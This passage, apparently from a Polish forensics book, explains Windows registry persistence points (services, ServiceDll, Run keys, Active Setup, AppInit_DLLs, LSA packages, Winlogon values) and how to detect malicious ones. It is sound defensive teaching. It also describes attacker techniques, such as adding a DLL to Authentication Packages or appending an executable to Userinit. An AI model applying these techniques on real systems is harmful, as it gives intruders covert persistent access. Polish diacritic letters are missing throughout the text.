ImagePath cieka do pliku wykonywalnego (w przypadku usugi) lub pliku .sys
(w przypadku sterownika), ktry ma zosta uruchomiony.
Start klucz okrelajcy sposb i czas zaadowania sterownika lub usugi. Przedzia
dozwolonych wartoci tego klucza to 0-4. Wikszo szkodliwych programw ma warto
ustawion na 2 (automatycznie):
0x0 przez proces rozruchu (przez program adujcy jdro dotyczy tylko sterownikw),
0x1 przez system (przez podsystem wejcia-wyjcia podczas inicjacji jdra dotyczy
tylko sterownikw),
0x2 automatycznie (przez Meneder kontroli usug podczas uruchamiania systemu
dotyczy tylko usug),
0x3 rcznie (aplikacja uytkownika musi bezporednio zada uruchomienia usugi),
0x4 wyczone.
Type okrela jeden z kilku typw usug, z ktrych najczciej spotykane s:

0x1 sterownik,
0x2 sterownik systemu plikw,
0x10 usuga dziaajca we wasnym procesie,
0x20 usuga wsplnie uytkujca proces.
DependOnGroup lub DependOnService okrela inne grupy usug i indywidualne usugi,
ktre musz zosta uruchomione przed zaadowaniem i uruchomieniem tej usugi.
Group okrela grup, do ktrej naley ta usuga. Usugi nalece do jednej grupy s
uruchamiane razem.
Jeli przyjrzysz si tym wartociom dla kilku kluczy usug w dowolnym systemie Windows,
zauwaysz, e wikszo z nich ma tak sam ciek ImagePath C:\WINDOWS\system32\svchost.exe.
A jeli przyjrzysz si licie procesw, znajdziesz wiele instancji pliku svchost.exe dziaajcych w jednym
z wczeniej opisanych kontekstw uytkownikw Usuga sieciowa, SYSTEM itd. O co w tym chodzi?
Wikszo usug systemu Windows ma posta bibliotek DLL, a nie samodzielnych plikw
wykonywalnych. Do adowania i wykonywania kodu znajdujcego si w tych plikach system
Windows wykorzystuje proces nadrzdny svchost.exe, do ktrego cieka jest podana w wartoci
ImagePath. Sam plik DLL te musi by odpowiednio skonstruowany, aby svchost.exe mg go
zaadowa jako usug, np. musi zawiera eksportowan funkcj o nazwie ServiceMain okrelajc
jego punkt pocztkowy.
Poniszy podklucz rejestru wraz z wartoci okrela plik DLL do zaadowania przez proces
nadrzdny okrelony w wartoci ImagePath (rysunek 12.15):
HKLM\CurrentControlSet\services\{nazwausugi}\Parameters\ServiceDll
RYSUNEK 12.15. Klucz rejestru usugi LanmanWorkstation. Wyrnieniem zaznaczono warto ServiceDll,
ktra jest ustawiona na %SystemRoot%\System32\wkssvc.dll
Jako e jest wiele sposobw wykonywania usug, podczas sprawdzania, czy dana usuga moe
adowa szkodliwy plik, zawsze naley przyjrze si wartociom ImagePath i ServiceDll (jeli istnieje).
Podczas prowadzonych ledztw odkrylimy, e hakerzy wol instalowa szkodliwe programy jako
ServiceDll, adujc je przez svchost.exe atwiej si ukry na licie procesw wrd wielu podobnie
adowanych usug. Haker moe utworzy now usug lub zmieni konfiguracj parametru ServiceDll
istniejcej, lecz wyczonej mao znaczcej usugi.
Analiza usug w czasie dziaania systemu

Meneder kontroli usug systemu Windows, services.exe, uruchamia usugi podczas rozruchu
systemu (na podstawie konfiguracji wymienionych wczeniej kluczy rejestru). W systemie Windows
dostpnych jest kilka polece, za pomoc ktrych mona pobiera informacje z Menedera kontroli
usug. Niektre pakiety narzdzi do analizy na ywo korzystajce z API systemu Windows stosuj
te metody do tworzenia list usug.
Polecenie konsoli sc suy do pracy z Menederem kontroli usug w dziaajcym systemie
Windows. Przykadowo polecenie sc query (lub sc queryex, jeli potrzebna jest wiksza ilo
danych) spowoduje wywietlenie wszystkich aktualnie skonfigurowanych usug z informacj o ich
stanie (np. dziaa lub nie dziaa). Na rysunku 12.16 pokazano przykadowy wynik polecenia sc
query. Polecenie to moe te uruchamia, zatrzymywa oraz tworzy usugi w systemie lokalnym
lub zdalnym (pod warunkiem, e ma si moliwo zdalnego zalogowania si w tym systemie
z uprawnieniami administratora). Szczegowy opis polecenia sc mona znale na poniszej
stronie internetowej.
W INTERNECIE
technet.microsoft.com/en-us/library/cc754599.aspx
RYSUNEK 12.16. Wynik polecenia sc query wykonanego w celu sprawdzenia stanu usugi wudfsvc
Ewentualnie mona te w menu Uruchom wczy przystawk Usugi o nazwie services.msc,

w ktrej mona przeglda i edytowa konfiguracj istniejcych usug.
Jednym powanym ograniczeniem polecenia sc i przystawki services.msc jest to, e adne z tych
narzdzi nie umoliwia przegldania ani edytowania wartoci ServiceDll adnej z hostowanych
usug. Parametr ten mona jednak znale i zmieni w edytorze rejestru, np. regedit.
Jeli za pomoc narzdzi API systemu Windows lub drog analizy obrazu pamici pozyska si
dodatkowo list procesw, mona te przejrze dziaajce usugi warto ImagePath kadej z nich
bdzie zgadza si z nazw dziaajcego procesu, ktrego procesem nadrzdnym najczciej jest
services.exe. A co z wszystkimi zgrupowanymi hostowanymi usugami dziaajcymi pod instancjami
svchost.exe? Skd wiadomo, ktra instancja svchost.exe obsuguje okrelon usug?
Jest kilka narzdzi do analizy pamici, np. Volatility Framework, potraficych przeanalizowa
dane konfiguracyjne usug z pamici i powiza nazwy dziaajcych usug z identyfikatorami
procesw. Ponadto zawsze mona za pomoc polecenia konsoli tasklist /svc (macierzyste
polecenie systemu Windows) utworzy list usug dziaajcych pod kadym procesem svchost.exe.
Przykadowo na rysunku 12.17 wida, e pod kontrol svchost.exe (PID 1052) dziaaj dwie usugi
RpcEptMapper i RpcSs.
RYSUNEK 12.17. Wynikiem polecenia tasklist /svc jest lista dziaajcych usug zgrupowanych wg
identyfikatorw procesw
Klucze Run i RunOnce

S to proste klucze, ktrych przeznaczenia atwo mona si domyli wskazuj plik wykonywalny,
ktry ma zosta uruchomiony podczas rozruchu systemu (jeli w gazi HKLM) lub podczas
logowania uytkownika (jeli w gazi NTUSER.DAT uytkownika). Oto cztery najczciej
uywane klucze Run:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,
HKEY_USERS\{SID}\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
HKEY_USERS\{SID}\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce.
Wartoci tych kluczy okrelaj (czasami) deskryptywn nazw elementu Run, a ich dane zawieraj
ciek do pliku wykonywalnego i wszelkie podane argumenty. Przykadowo na rysunku 12.18
wida trzy wartoci pod kluczem HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,
z ktrych kada reprezentuje aplikacj uruchamian podczas rozruchu systemu.
RYSUNEK 12.18. Zestaw kluczy uruchamiania w przykadowym systemie
Podobne zastosowanie ma klucz RunOnce. Warto do niego dodana zostanie uruchomiona raz,
a nastpnie usunita.
Instalator aktywny
Jest to mechanizm systemu Windows przeznaczony dla wszystkich uytkownikw i sucy do obsugi
procesu instalacji programw oraz aktualizacji. Dodano go w systemie Windows 98 i wci uywa go
wiele legalnych aplikacji, jak i szkodliwych programw. Klucze instalatora aktywnego (Active Setup)
znajduj si w dwch miejscach:
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components,
HKEY_USERS\{SID}\SOFTWARE\Microsoft\Active Setup\InstalledComponents.
W typowym systemie pod kluczem \Installed Components\ znajduj si klucze o nazwach
odpowiadajcych wartociom GUID. Aplikacje z reguy generuj i wykorzystuj te identyfikatory
po to, by nie doszo do przypadkowego nadpisania ustawie. Jednak hakerzy czsto s leniwi
i wykorzystuj ten sam identyfikator GUID w wielu generacjach swoich szkodliwych programw.
Czasami mona zbada dokadniej te identyfikatory (czsto po prostu wpisujemy je do wyszukiwarki
Google), aby dowiedzie si, czy zostay wykryte i zarejestrowane w publicznie dostpnych portalach,
biuletynach producentw oprogramowania antywirusowego, na blogach o tematyce bezpieczestwa
komputerowego lub forach. To znacznie uatwia wykrywanie znanych zagroe.
Podklucz GUID legalnego elementu aktywnego instalatora moe mie wiele wartoci, np.
Version, IsInstalled i StubPath. Na rysunku 12.19 pokazano klucz Active Setup platformy .NET
Framework. Wartoci te pomagaj w funkcjonowaniu klucza Active Setup podczas logowania
uytkownika aplikacja moe sprawdzi, czy dany klucz Active Setup w HKLM jest obecny take w HKCU,
porwna wartoci oraz zdecydowa, co robi dalej (np. wykona instalacj lub aktualizacj).
RYSUNEK 12.19. Legalny klucz Active Setup\Installed Components platformy .NET Framework
Jednak najwaniejsz wartoci wrd tych kluczy i jedyn, ktrej naprawd uywaj hakerzy
jest StubPath. Zawiera ona ciek do pliku wykonywalnego wraz z potrzebnymi argumentami.
Haker moe wic wygenerowa klucz na kocu cieki \Active Setup\Installed Components\{GUID}\,
ustawi warto StubPath i w ten sposb zapewni sobie uruchamianie programu wraz z systemem
lub logowaniem uytkownika (w zalenoci od wybranej gazi rejestru).
Uwaga Przykadowo jedna z domylnych konfiguracji backdoora Poison Ivy wykorzystuje klucz Active Setup
(rysunek 12.20).
RYSUNEK 12.20. Klucz Active Setup utworzony przez program Poison Ivy w celu przechowywania danych
konfiguracja ta uruchamia C:\WINDOWS:wins.exe, czyli alternatywny strumie katalogu C:\WINDOWS
AppInt_DLLs
Warto rejestru AppInt_DLLs zawiera list plikw DLL, ktre bd automatycznie zaadowane,
gdy zostanie uruchomiona jakakolwiek aplikacja dziaajca w trybie uytkownika poczona
z user32.dll. Jeli do wartoci tej haker doda szkodliwy plik DLL, jego kod zostanie wstrzyknity
do kadego uruchomionego pniej programu:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
Na to, czy dany plik zdefiniowany w wartoci AppInt_DLLs rzeczywicie zostanie zaadowany, wpyw
maj wersja systemu Windows i pewne ustawienia konfiguracyjne. Istnieje moliwo globalnego
wyczenia adowania wszystkich plikw AppInt_DLLs. Naley w tym celu ustawi warto klucza
rejestru HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs
na 0x0. W systemach Windows Vista, 7 i Server 2008 mona te zada, aby wszystkie adowane
pliki wymienione w wartoci AppInit_DLLs byy podpisane cyfrowo. W tym celu naley ustawi
warto RequireSignedAppInit_DLLs (w tym samym kluczu) na 0x1. W systemie Windows
Server 2008 R2 wymg ten jest wczony domylnie.
Pakiety LSA
Trzy klucze rejestru su do konfigurowania usugi LSA (ang. Local Security Authority) i sposobu
obsugi przez ni zdarze uwierzytelniania. System Windows podczas rozruchu automatycznie
aduje pliki DLL podane w tych wartociach:
HKLM\System\CurrentControlSet\Control\Lsa\Authentication Packages,
HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages,
HKLM\System\CurrentControlSet\Control\Lsa\Security Packages.
Szkodliwy program adowany jako pakiet LSA wcale nie musi implementowa jakiejkolwiek
funkcjonalnoci LSA musi tylko zosta prawidowo zaadowany i wykonany.
Pakiety uwierzytelniania (ang. Authentication Packages) implementuj kod potrzebny
do uwierzytelniania uytkownikw przez rne protokoy. Typowe ustawienia domylne pod
t wartoci to msv1_0 (lokalne i domenowe logowania NTLM), kerberos (uwierzytelnianie
Kerberos), wdigest (uwierzytelnianie szyfrowane) oraz tspkg (pakiet jednorazowego logowania
usug terminalowych). Pakiety zabezpiecze (ang. Security Packages) implementuj podstawowe
protokoy bezpieczestwa rozpoznawane przez system operacyjny i mog mie wartoci domylne
podobne do wartoci pakietw uwierzytelniania. W kocu pakiety powiadomie (ang. Notification
Packages) s wywoywane przy ustawieniu i zmienianiu hase. Do typowych domylnych danych
w tym kluczu zaliczaj si pakiety FPNWCLNT (ang. File and Print Services for NetWare), RASSFM
(ang. Remote Access Subauthentication), KDCSVC (ang. Kerberos Key Distribution Center Service)
oraz scecli (ang. Security Configuration Engine client). Firma Microsoft opisaa te pakiety
w dokumentacji zamieszczonej na stronie technet.microsoft.com/en-us/library/cc951687.aspx.
Kada z tych wartoci jest typu REG_MULTI_SZ, co znaczy, e ich dane s zbiorami acuchw
zakoczonych wartoci null. Ponadto do pakietw mona si odwoywa bez podawania
rozszerzenia .DLL. Jeli np. warto Security Packages zostanie ustawiona na wdigest msv1_0
kerberos, Windows automatycznie bdzie prbowa zaadowa pliki wdigest.dll, msv1_0.dll
oraz kerberos.dll z katalogu %SYSTEMROOT%\system32.
Haker moe wic wykorzysta te klucze do zapisywania danych szkodliwych programw.
Przykadowo dodanie evil do listy REG_MULTI_SZ w wartoci Authentication Packages spowoduje,
e system przy rozruchu bdzie automatycznie adowa plik %SYSTEMROOT%\system32\evil.dll.
Zaawansowany i szeroko znany wirus Flame wykorzystywa ten mechanizm przez dodawanie
referencji do swojej nazwy pliku (domylnie mssecmgr.ocx) do wartoci Authentication Packages.
Obiekty pomocnicze przegldarki

Obiekty pomocnicze przegldarki (ang. Browser Helper Objects BHO) s dodatkami lub
wtyczkami do przegldarki Internet Explorer. Mog wsppracowa z treci wywietlan przez
przegldark i ni manipulowa oraz mog rozszerza interfejs uytkownika Internet Explorera.
Kady, kto kiedykolwiek naprawia komputer znajomego, napotka BHO w formie przydatnych
paskw narzdzi instalowanych wraz z innymi programami. Jako e obiekty BHO s automatycznie
adowane przez przegldark Internet Explorer, s one popularnym mechanizmem utrwalania
wrd szkodliwych programw zwaszcza typu adware i scamware, ktre dodaj reklamy do
treci stron internetowych, przekierowuj uytkownikw na niechciane strony i monitoruj prac
w przegldarce.
Jak dziaaj obiekty BHO? Ich pliki DLL to skadniki COM (ang. Component Object Model)
adowane do przestrzeni procesu Internet Explorera przy kadym uruchomieniu nowej instancji
programu iexplore.exe. Przegldarka ta udostpnia punkty zaczepienia umoliwiajce zaadowanym
BHO wchodzi w interakcj z rnymi aspektami funkcjonalnoci przegldarki. Wszystkie obiekty
COM, wcznie z BHO, maj identyfikator klasy (zwany CLSID zasadniczo GUID) pozwalajcy
je jednoznacznie identyfikowa. List znajdujcych si w systemie obiektw BHO mona znale
pod poniszym kluczem:
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CLSID}\
Nastpnie zajrzyj do wartoci kadego interesujcego Ci identyfikatora CLSID

HKEY_CLASSES_ROOT\CLSID\{CLSID}\InprocServer32\(Default). Jej dane wskazuj plik DLL
zwizany z obiektem COM.
Uwaga Identyfikatory CLSID najpopularniejszych obiektw BHO (i niektrych wirusw) s takie same
w rnych systemach. Jeli wic natkniesz si na nieznany identyfikator, poszukaj go w Google.
Oczywicie haker zawsze moe zainstalowa szkodliwy plik DLL pod identyfikatorem legalnego
obiektu BHO, wic i tak trzeba sprawdzi podpis cyfrowy pliku, jego skrt oraz potwierdzi jego
autentyczno na inne sposoby.
W przegldarce Internet Explorer 7 dodatkowo wprowadzono opcj menu o nazwie Zarzdzaj

dodatkami, za pomoc ktrej rwnie mona przeglda oraz wcza i wycza wybrane obiekty BHO.
Rozszerzenia powoki
Rozszerzenia powoki s dla Eksploratora Windows tym, czym obiekty BHO dla przegldarki
Internet Explorer. Umoliwiaj rozszerzanie funkcjonalnoci Eksploratora Windows, np. przez
dodanie elementw do menu kontekstowego, ktre pojawia si po klikniciu prawym przyciskiem
myszy pliku lub folderu. Podobnie jak obiekty BHO, rozszerzenia powoki s bibliotekami DLLCOM,
wic musz implementowa pewne interfejsy i mie okrelone funkcje eksportowane.
Kady plik DLL COM rozszerzenia powoki znajduje si na licie pod kluczem i wartoci
HKCR\CLSID\{CLSID}\InprocServer32\(Default). Ponadto rozszerzenie powoki musi si
zarejestrowa, aby mona byo rozszerza wybrane elementy powoki pliki, katalogi, napdy,
drukarki itd. Mechanizmy obsugi wszystkich tych elementw s wymienione w kluczu
HKCR\{podklucz}\shellex\.
Uwaga W systemie Windows istnieje moliwo wcignicia wybranych identyfikatorw CLSID na czarn
list za pomoc klucza HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked.
Analogicznie, jeli ustawi si HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
EnforceShellExtensionSecurity na 1, to system Windows bdzie adowa tylko rozszerzenia powoki
okrelone w kluczu HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\.
Wicej informacji o rnych sposobach konfiguracji rozszerze powoki w systemach

Windows i potrzebnych do tego podkluczach znajduje si w portalu MSDN w artykule pt.
Registering Shell Extension Handlers.
W INTERNECIE
msdn.microsoft.com/en-us/library/windows/desktop/cc144110(v=vs.85).aspx
Winlogon GINA
Obecna w systemach Windows 2000, XP oraz Server 2003 usuga GINA (ang. Graphical Identification
and Authentication) umoliwia programistom aplikacji rozszerzanie i dostosowywanie systemowego
monitu logowania. To ona miaa zapewni alternatywne mechanizmy uwierzytelniania. Aby z niej
skorzysta, wystarczy zaimplementowa plik DLL z potrzebnymi funkcjami eksportowymi wymaganymi
przez usug oraz ustawi w wartoci rejestru GinaDLL ciek do tego pliku. Proces winlogon.exe
automatycznie zaaduje ten plik podczas logowania HKLM\Software\Microsoft\Windows NT\
CurrentVersion\Winlogon\GinaDLL.
Oczywicie hakerzy szybko odkryli, e funkcj t mona wykorzysta do niecnych celw.
Szkodliwy plik DLL GINA moe wykonywa ataki typu czowiek porodku podczas
uwierzytelniania w systemie Windows. Wikszo szkodliwego oprogramowania wykorzystujcego
funkcj GINA, z jakim mielimy do czynienia, po prostu rejestruje dane powiadczajce tosamo
wpisywane przez uytkownika podczas logowania w pliku.
Firma Microsoft zlikwidowaa moliwo tworzenia wasnych dostawcw GINA i w systemach
Windows Vista, Server 2008 oraz nowszych zastpia j now usug dostawcy powiadcze.
Powiadomienia usugi logowania do systemu

Podobnie jak GINA, pakiety powiadamiania usugi logowania to rwnie skadnik przestarzaego
systemu logowania Windows 2000, XP i Server 2003. Pliki DLL wymienione w poniszej wartoci
rejestru mogy odbiera powiadomienia od procesu winlogon.exe o takich zdarzeniach jak logowanie
i wylogowanie uytkownika, zablokowanie ekranu oraz wczenie wygaszacza ekranu:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
Ustawiajc t warto na szkodliwy plik DLL, haker mg zaadowa i wykona swj kod przy
kadym zdarzeniu logowania w systemie Windows. Firma Microsoft usuna wic t funkcjonalno
w systemach Windows Vista, Server 2008 i nowszych.
Powoka logowania
Uytkownicy systemu Windows mog dostosowywa powok adowan podczas logowania.
Domylnie jest to Explorer.exe, ale w wartoci rejestru Winlogon\Shell mona ustawi dowolny
inny plik wykonywalny. Poniewa niestandardowe powoki s bardzo rzadko uywane, analityk
powinien zawsze dokadnie przyjrze si plikom wykonywalnym wskazywanym przez dwa
ponisze klucze:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell,
HKEY_USERS\{SID}\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell.
Klucz i warto Winlogon\Shell mog znajdowa si w gazi HKLM i gaziach poszczeglnych
uytkownikw, poniewa kady uytkownik moe dostosowa powok do wasnych potrzeb.
Warto Userinit
Proces logowania do systemu automatycznie wykonuje pliki wykonywalne wymienione w wartoci
rejestru Userinit:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Domylnie warto ta jest ustawiona na userinit, dziki czemu wykonywany jest plik
%SYSTEMROOT%\system32\userinit.exe. Plik ten z kolei aduje skrypty logowania i zasad
grupowych, kilka innych regu automatycznego wykonywania oraz powok Explorer.
Istnieje jednak te moliwo dopisania do tej wartoci dodatkowych cieek i nazw plikw
wykonywalnych (oddzielanych przecinkami).
Gdyby np. warto Userinit ustawiono na userinit, "C:\cieka\do\malware.exe", program
malware.exe byby automatycznie uruchamiany podczas logowania uytkownika.
Identyfikacja szkodliwych regu automatycznego wykonywania

Przegldanie gigantycznej listy kluczy rejestru, ktre mog zosta wykorzystane przez wirusy, to
przytaczajce zadanie. Trudno wykry zowieszczy klucz automatycznego wykonywania w gszczu
innych kluczy, cho istnieje kilka technik analitycznych, za pomoc ktrych mona nieco zawzi
i przefiltrowa obszar poszukiwa. Metody te w wikszoci przypadkw mona stosowa podczas
wyszukiwania wszystkich rodzajw regu automatycznego uruchamiania programw w rejestrze
w kocu wszystko sprowadza si do szukania par klucz-warto wskazujcych pliki
wykonywalne lub DLL na dysku.
Podczas analizowania zbioru kluczy dotyczcych automatycznego uruchamiania aplikacji
wielu analitykw najpierw prbuje wzrokowo wykry podejrzane wpisy pliki o nietypowych
ciekach, literwki, niepoprawne opisy i inne anomalie. Jest to do ryzykowna metoda, zwaszcza
wtedy, gdy wemie si pod uwag, jak wiele jest rozmaitych programw. Cz z nich to niezbyt
wysokiej jakoci aplikacje mogce instalowa si w tych samych typach kluczy automatycznego
wykonywania, co wirusy. Pamitaj, e haker majcy konkretnie wyznaczony cel moe specjalnie
tak skonfigurowa swj wirus, aby miesza si niepostrzeenie z legalnymi skadnikami systemu
Windows.
Aby lepiej zrozumie, o co nam chodzi, spjrz na ponisz tabel z list czterech usug systemu
Windows. Sprbuj na podstawie tych informacji zgadn, czy ktre z nich s szkodliwe.
Podpowied: przynajmniej jedna usuga jest szkodliwa.
ServiceName: hpdj
Description: [none]
ImagePath: C:\Documents and Settings\johncd\Local Settings\Temp\hpdj.exe
ServiceName: iprip
Description: Listens for route updates sent by routers that use the Routing Information Protocol
ImagePath: C:\Windows\system32\svchost.exe
ServiceDll: C:\Windows\system32\iprinp32.dll
ServiceName: rfalert
Description: A module which sends alerts and notifications of monitered events
ImagePath: D:\Apps\RightFax\Bin\Alertmon.exe
ServiceName: synergy
Description: Allows another computer to share its keyboard and mouse with this computer
ImagePath: C:\Program Files\Synergy\synergyc.exe
Moe zauwaye, e w opisie usugi rfalert jest literwka (monitered zamiast monitored).
Usuga hpdj wydaje si podejrzana z kilku powodw szczeglnie dlatego, e nie ma opisu i jest
uruchamiana z katalogu temp uytkownika. W opisie usugi synergy jest bd polegajcy na braku
apostrofu w sowie its (powinno by it's). Zdziwisz si wic pewnie, jeli dowiesz si, e te trzy
usugi s legalnymi aplikacjami zewntrznymi (najdziwniejsza z nich, czyli hpdj, to pozostao
po oprogramowaniu drukarki firmy HP). W tabeli tej szkodliwa jest tylko usuga iprip. Jej nazwa
i opis s identyczne z danymi legalnej usugi iprip systemu Windows, ale haker zmodyfikowa
klucz ServiceDll tak, aby wskazywa szkodliwy plik iprinp32.dll, a nie prawidowy plik iprip.dll.
Skoro metoda wzrokowa jest tak zawodna, jakie s lepsze sposoby na wykrywanie
szkodliwych usug? Biorc pod uwag to, jakie s moliwoci zapisywania danych w rejestrze
w kluczach i powizanych z nimi plikach, ktre s przez nie adowane zalecamy wykonanie
nastpujcej procedury.
1. Wyklucz trwae pliki binarne podpisane przez godnych zaufania wydawcw ale nie wyrzucaj
cakowicie z krgu podejrze podpisanych plikw binarnych. Jeszcze do tego wrcimy.
2. Wyklucz trwae elementy utworzone poza interesujcym Ci okresem (jeli udao si
okreli taki okres z du pewnoci). rda informacji czasowych mog zawiera dane
o ostatniej modyfikacji klucza rejestru oraz czasy MACE powizanych z nimi plikw.
3. Zbadaj cieki pozostaych plikw binarnych. W ten sposb moe uda si zidentyfikowa
szkodliwe pliki zapisane w podejrzanych lokalizacjach, np. trwae pliki wykonywalne
dziaajce w katalogu plikw tymczasowych uytkownika. Ponadto istnieje moliwo
wykluczenia trwaych plikw binarnych na rzadko uywanych przez hakerw ciekach.
Analityk sam powinien wybra metod postpowania na podstawie posiadanej wiedzy
na temat taktyki i sposobu dziaania hakera. Hakerzy lubi wykorzystywa znane katalogi,
np. cieki w katalogu %SYSTEMROOT%. Rzadziej posuguj si gbiej zagniedonymi

katalogami uywanymi przez mao znane aplikacje. Oczywicie bardziej zaawansowany haker,
ktry przeprowadzi szeroko zakrojone dziaania rozpoznawcze w zdobytym systemie lub
rodowisku, moe celowo wykorzysta wanie takie cieki miej oczy szeroko otwarte.
4. Poszukaj skrtw MD5 pozostaych trwaych plikw binarnych w repozytoriach znanych
nieszkodliwych (np. Bit9 File Advisor) lub szkodliwych (np. VirusTotal) programw.
5. Porwnaj pozostae niewiadome ze znan konfiguracj, np. zotym obrazem
uywanym do instalowania systemw w rodowisku.
Oczywicie w rejestrze nie s przechowywane ani podpisy cyfrowe, ani skrty plikw.
Informacje te trzeba zdoby, analizujc same pliki trwae. Przeprowadzenie takiej akcji rcznie
zajoby bardzo duo czasu, ale na szczcie jest kilka narzdzi, ktre pozwalaj zautomatyzowa
ten proces. Opis tego typu narzdzi zamiecilimy dalej w tym podrozdziale, ale ju teraz moemy
poleci programy SysInternals Autoruns i Mandiant Redline (z moduami services i persistence).
Oba te narzdzia znajduj usugi systemu Windows, zbieraj informacje o podpisach cyfrowych
oraz obliczaj skrty MD5 dla kadego pliku binarnego usugi.
Na rysunku 12.21 przedstawiono widok Persistence (trwao) w programie Mandiant Redline.
Zwr uwag, e narzdzie to dla uatwienia pokazuje dane dotyczce zarwno rejestru, jak
i systemu plikw.
RYSUNEK 12.21. Wyniki w programie Redline

Pamitaj, e ufanie podpisom cyfrowym to sposb na zredukowanie iloci informacji w celu

skupienia wysiku na odpowiednim zbiorze danych. Podpisy cyfrowe nie s jednak idealne!
Z wasnego dowiadczenia wiemy, e zaawansowani hakerzy coraz czciej bior na cel certyfikaty
cyfrowe i infrastruktury podpisywania kodu. Zasoby takie s wykorzystywane do podpisywania
szkodliwych programw. Nie oznacza to oczywicie, e naley automatycznie nie ufa wszystkim
podpisanym plikom. Ale powinno si bra pod uwag take moliwo oszustwa w tym obszarze
zwaszcza wtedy, kiedy wskazuj na to jeszcze inne dowody.
Analogicznie nie powinno si oczekiwa, e wszystkie legalne trwae pliki np. wspierajce
usugi systemu Windows bd podpisane cyfrowo. Dotyczy to szczeglnie aplikacji zewntrznych,
cho widzielimy nawet rdzenne pliki systemu operacyjnego bez podpisu lub gubice podpis
po aktualizacji systemu. Warto przy tej okazji zauway, e w 64-bitowych wersjach systemu
Windows Vista i nowszych wszystkie sterowniki musz by podpisane cyfrowo.
Wczeniej napisalimy, e analiza osi czasu pomaga w eliminacji kluczy automatycznego
uruchamiania i powizanych z nimi plikw, ktre zostay utworzone poza interesujcym nas
okresem aktywnoci hakera. Plikowych metadanych czasowych mona te uywa na inne sposoby
w celu identyfikowania podejrzanych mechanizmw utrwalania. Jeli np. podczas krelenia osi
czasu zdarze dotyczcych kluczy rejestru i metadanych plikowych w systemie zauwaysz, e
pewien znany klucz automatycznego uruchamiania ostatni raz by modyfikowany w interesujcym
Ci okresie, moesz sprawdzi, czy wskazywany przeze plik jest szkodliwy. A jeeli wykryjesz
szkodliwy plik jak inn metod, sprawd rwnie, czy odnosz si do niego po nazwie lub penej
ciece jakie klucze automatycznego uruchamiania bez wzgldu na to, kiedy byy one ostatnio
modyfikowane. Techniki te pozwalaj przeprowadzi analiz czasow zdarze bez klapek na oczach
np. mona tak bardzo skoncentrowa si na wybranym okresie, e przeoczy si wszelkie inne znaki.
Skoro mowa o czasie, przypominamy, e klucze rejestru przechowuj dat ostatniej modyfikacji,
a nie wartoci ani dane. Niestety niektre klucze automatycznego wykonywania s wartociami
w ciekach czsto uywanych przez system operacyjny lub inne oprogramowanie. Przykadowo
wartoci w kluczu HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ znajduj si
bezporednio pod kluczem \Run\, co oznacza, e dodanie lub zmiana jakiegokolwiek automatycznie
uruchamianego programu wykorzystujcego ten mechanizm spowoduje aktualizacj jedynego
pola czasowego dla tej cieki. To samo dotyczy cieek gwnych usug systemu Windows
(np. HKLM\System\CurrentControlSet\Services\{nazwausugi}\). Aktualizacje systemu Windows
i dodatki Service Pack czsto dotykaj wszystkich kluczy serwisowych, powodujc zaktualizowanie
ich daty ostatniej modyfikacji. Na szczcie podklucze Parameters i Security, oba obecne w wielu
usugach, rzadziej ulegaj wpywowi takich aktualizacji. W efekcie ich data ostatniej modyfikacji
moe by odporniejsza na zmiany i bardziej wartociowa z punktu widzenia analityka.
W kocu, jeli po analizie rejestru uda si znale dowody istnienia szkodliwej usugi,
koniecznie przejrzyj te systemowy dziennik zdarze. Meneder kontroli usug rejestruje zdarzenia
dotyczce utworzenia, zatrzymania oraz uruchomienia usugi. Jednak jak zawsze jest pewne
ale: dotyczy to tylko usug systemowy dziennik zdarze nie rejestruje informacji o zdarzeniach
zwizanych z innymi rejestrowymi mechanizmami utrwalania opisanymi w tym rozdziale.
Ponadto haker moe skonfigurowa usug bez uywania Menedera kontroli usug, aby unikn
wygenerowania zdarzenia utworzenia usugi. Miej te wiadomo, e trwaa szkodliwa usuga
najczciej uruchamia si wraz z systemem i wraz z nim koczy dziaanie, wic zdarzenia jej
uruchomienia i zatrzymania zarejestrowane w systemowym dzienniku zdarze mog nie
odzwierciedla aktywnoci hakera, lecz raczej normalny cykl korzystania z komputera przez
uytkownika. Z drugiej strony daty pierwszego i ostatniego zdarzenia zwizanego z usug
pozwalaj okreli ramy czasowe wamania. Wicej informacji o typach wpisw dziennikowych
generowanych przez dziaajce usugi znajduje si w podrozdziale Dzienniki zdarze.
Klucze rejestru w gaziach uytkownikw

W odrnieniu od opisanych do tej pory dowodw z rejestru, gazie uytkownika zawieraj lady
dotyczce konkretnie ustawie i aktywnoci poszczeglnych kont w systemie Windows. Zalicza si
do nich wszystko, od zapisu uruchamianych aplikacji po lady dostpu do lokalnych i zdalnych
katalogw za pomoc Eksploratora Windows.
Skoro kady uytkownik ma wasne gazie w rejestrze, jak wybra odpowiednie z nich
do analizy? Badanie wszystkich moe nie by dobrym rozwizaniem, jeli naszym celem jest
przefiltrowanie danych i skoncentrowanie uwagi na tym, co najwaniejsze. Dlatego priorytetem
powinno by pobranie i przeanalizowanie gazi NTUSER.DAT i USRCLASS.DAT z kadego
konta, ktrego zabezpieczenia zostay zamane. Jeli jedyn posiadan informacj s ramy czasowe
wystpowania podejrzanej aktywnoci w systemie (np. okrelone po analizie dziennikw zdarze
lub innych rde dowodw), naley przejrze wszystkie gazie uytkownikw zawierajce klucze
zmodyfikowane wanie w tym czasie. Nie naley te wyklucza kont komputerowych, np.
NetworkService i LocalSystem (oba wykorzystywane przez Menedera kontroli usug). Nieraz
